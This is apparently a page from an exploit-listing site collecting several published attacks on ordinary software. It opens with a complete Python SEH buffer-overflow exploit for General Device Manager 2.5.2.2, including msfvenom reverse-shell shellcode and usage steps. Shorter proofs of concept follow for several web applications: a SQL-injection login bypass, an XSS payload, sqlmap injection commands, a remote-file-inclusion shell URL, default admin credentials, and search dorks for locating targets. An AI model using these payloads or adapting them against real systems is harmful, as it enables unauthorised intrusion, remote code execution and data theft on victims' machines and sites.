Latest exploits :: CodePwn

<pre><code># Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH) # Date: 30.07.2023 # Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ= # Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip # Exploit Author: Ahmet Ümit BAYRAM # Tested Version: 2.5.2.2 # Tested on: Windows 10 64bit # 1.- Run python code : exploit.py # 2.- Open pwned.txt and copy all content to clipboard # 3.- Open Device Manage and press Add Device # 4.- Paste the content of pwned.txt into the 'IP Address' # 5.- Click 'OK' # 6.- nc.exe local IP Port 1337 and you will have a bind shell # 7.- R.I.P. Condor <3 import struct offset = b"A" * 1308 nseh = b"\xEB\x06\x90\x90" # jmp short seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll) nops = b"\x90" * 32 #shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode shellcode = b"" shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4" shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13" shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4" shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26" shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f" shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54" shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64" shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d" shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02" shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed" shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9" shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73" shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44" shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14" shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13" shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86" shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91" shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b" shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef" shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c" shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48" shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1" shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7" shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60" shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2" shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5" shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf" shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd" shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5" shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72" shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43" shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9" final_payload = offset + nseh + seh + nops + shellcode # write the final payload to a file try: with open('pwned.txt', 'wb') as f: print("[+] Creating %s bytes evil payload..." %len(final_payload)) f.write(final_payload) f.close() print("[+] File created!") except: print("File cannot be created!") </code></pre>

<pre><code>==================================================================================================================================== | # Title : CoolAdmin 1.0 Auth By Pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://colorlib.com/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : User & Pass = ADMIN' OR 1=1# [+] Panel : http://wwcddsakoncom/home.php Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : cityvariety LMS 2.2 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://www.cityvariety.co.th/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf'%22()%26%25<acx><ScRiPt%20>prompt(980997)</ScRiPt>&id=2481&name= [+] https://wwsesaogoth/news/download/?file=files/com_news/2023-05_df55c087b4d33c8.pdf%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(980997)%3C/ScRiPt%3E&id=2481&name= Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : City Variety CMS 1.2 SQL injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://www.cityvariety.co.th/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /?cid=7 [+] D:\sqlmap>sqlmap.py -u https://wwsesaogoth/news/?cid=7 <=== inject hrer Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : AMSS++ V6.1 SQL injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit) | | # Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_full_update_6_1.rar | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /modules/mail/main/maildetail.php?id=174 <===== inject here D:\sqlmap>sqlmap.py -u https://127.0.0.1/amssictkan2com/modules/mail/main/maildetail.php?id=174 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Connectix Boards v0.5.2 RFI Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : https://github.com/dixy | | # Dork : "Powered by Connectix Boards © 2005" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] infected file : ConnectixBoards\index.php. Line 59 require $acts,$_GET['act'] [+] http://Target.il/index.php?act=[Shell] Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Conference Management Software V3.5.1 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://p30vel.ir/ | | # Dork : Designer Asan Hamayesh (Conference Management Software) Ver. 3.5.1 | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/icmaes2017com//en/files.php?id=2 <===== inject here [+] Login : http://127.0.0.1/icmaes2017com/en/signin.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : COMpose-IT CMS v2.0 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit) | | # Vendor : http://www.composeit.hu/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] appears to leave default credentials installed after installation. [+] Panel : http://127.0.0.1/nyir-uzemorvoshu/admin/index.php [+] User : root & pass : job314 Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : Comfex CMS v2.0.10 SqL InJection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : https://Comfex.org/ | | # Dork : Création et développement Comfex.org | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : http://127.0.0.1/novadzcom/index.php?p=2&ch=%C3%89clairage%20Ext%C3%A9rieur&prod=109 <===== inject here [+] login : https://127.0.0.1/nova/dzcom/admin/ Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= </code></pre>